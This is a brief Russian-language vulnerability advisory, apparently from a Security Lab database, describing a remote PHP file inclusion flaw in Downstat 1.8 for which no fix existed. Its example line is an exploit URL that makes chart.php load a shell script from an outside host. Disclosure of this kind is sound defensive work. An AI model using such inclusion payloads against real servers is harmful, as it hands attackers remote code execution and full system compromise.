Security Lab

php инклюдинг в Downstat

Дата публикации:14.09.2006
Дата изменения:17.10.2006
Всего просмотров:2869
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Downstat 1.x
Уязвимые версии: Downstat 1.8

Описание: Злоумышленник может включить и выполнить произвольный PHP код.

Пример/Эксплоит: http://site.com/downstat1.8/chart.php?art=http://silenz.be/shell.txt?

URL производителя:http://vmist.net/index.php?script=Downstat

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.